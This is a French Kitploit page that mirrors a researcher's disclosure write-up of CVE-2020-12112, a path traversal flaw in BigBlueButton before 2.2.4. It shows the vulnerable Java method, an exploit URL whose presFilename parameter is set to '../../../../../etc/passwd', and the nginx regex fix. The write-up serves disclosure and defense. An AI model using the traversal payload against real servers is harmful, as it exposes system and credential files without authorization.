Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2020-12112 — BigBlueButton versions inférieures à 2.2.4 présentent une vulnérabilité LFI permettant d'accéder à des fichiers sensibles. 🚨 | Kitploit
Outils/GitHubGitHub/tchenu/cve-2020-12112
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubtchenu/cve-2020-12112

CVE-2020-12112

BigBlueButton versions inférieures à 2.2.4 présentent une vulnérabilité LFI permettant d'accéder à des fichiers sensibles. 🚨

Voir le dépôt
141il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2020-12112 🚨

Les versions de BigBlueButton antérieures à 2.2.4 présentent une vulnérabilité LFI permettant d'accéder à des fichiers sensibles.

Histoire 📜

Lors d'un cours à distance sur une instance BigBlueButton, un étudiant de ma classe a partagé le lien de présentation des diapositives de mon professeur et j'ai remarqué que le nom du fichier était inclus dans l'URL.

Slack de l'école

root@kitploit:~
Student: "No need to write notes, I've got the slide."
Me: Well, I've got a security report to make. 😂

En jouant un peu avec, j'ai pu accéder au fichier /etc/passwd du serveur et découvrir l'existence d'une vulnérabilité de sécurité sur la solution open source Big Blue Button.

J'ai signalé la vulnérabilité, l'équipe BBB m'a rapidement répondu et a corrigé la vulnérabilité (en quelques jours seulement).

Poc 🧙

root@kitploit:~
public File getDownloadablePresentationFile(String meetingId, String presId, String presFilename) {
	log.info("Find downloadable presentation for meetingId={} presId={} filename={}", meetingId, presId, presFilename);

    File presDir = Util.getPresentationDir(presentationBaseDir, meetingId, presId);
    return new File(presDir.getAbsolutePath() + File.separatorChar + presFilename);
}

https://github.com/bigbluebutton/bigbluebutton/blob/v2.2.3/bbb-common-web/src/main/java/org/bigbluebutton/api/RecordingService.java#L90

Comme vous pouvez le voir, cette méthode utilisée par un PresentationController permet de télécharger un fichier de présentation en concaténant 3 paramètres.

  • Chemin absolu du fichier
  • Un caractère séparateur
  • Nom du fichier

Cela permet d'obtenir des liens comme celui-ci :

https://test.bigbluebutton.org/bigbluebutton/presentation/download/ffc98830dbfbac3dcc80cc4c5f30711ebd1c23e8-1586764259489/d2d9a672040fbde2a47a10bf6c37b6a4b5ae187f-1586764259500?presFilename=d2d9a672040fbde2a47a10bf6c37b6a4b5ae187f-1586764259500.pdf

Pour exploiter la vulnérabilité, il suffit d'obtenir un lien valide vers un fichier de présentation et de modifier le paramètre presFilename pour accéder à des fichiers sensibles.

https://test.bigbluebutton.org/bigbluebutton/presentation/download/ffc98830dbfbac3dcc80cc4c5f30711ebd1c23e8-1586764259489/d2d9a672040fbde2a47a10bf6c37b6a4b5ae187f-1586764259500?presFilename=../../../../../etc/passwd

Fichier /etc/passwd

Correctif 🤕

L'équipe BBB a corrigé la vulnérabilité dans la version 2.2.4 via une règle de configuration serveur (HTTP), une regex et un format de nom de fichier précis.

root@kitploit:~
		location /bigbluebutton/presentation/download {
			return 404;
		}

		location ~ "^/bigbluebutton/presentation/download\/[0-9a-f]+-[0-9]+/[0-9a-f]+-[0-9]+$" {
			if ($arg_presFilename !~ "^[0-9a-f]+-[0-9]+\.[0-9a-zA-Z]+$") {
				return 404;
			}
			proxy_pass         http://127.0.0.1:8090$uri$is_args$args;
			proxy_set_header   X-Forwarded-For   $proxy_add_x_forwarded_for;
			# Workaround IE refusal to set cookies in iframe
			add_header P3P 'CP="No P3P policy available"';
		}

https://github.com/bigbluebutton/bigbluebutton/commit/5ebdf5ca7718fc8bb3c08867edd150278e6a724c#diff-c7d77969a4547b5349e55c5466948a27R45

Références 🔍

  • https://nvd.nist.gov/vuln/detail/CVE-2020-12112
  • https://github.com/bigbluebutton/bigbluebutton/blob/master/bigbluebutton-web/grails-app/controllers/org/bigbluebutton/web/controllers/PresentationController.groovy
  • https://github.com/bigbluebutton/bigbluebutton/commit/5ebdf5ca7718fc8bb3c08867edd150278e6a724c
  • https://twitter.com/thibeault_chenu/status/1249976515917422593
  • https://twitter.com/bigbluebutton/status/1252706369486180353
Télécharger l’outil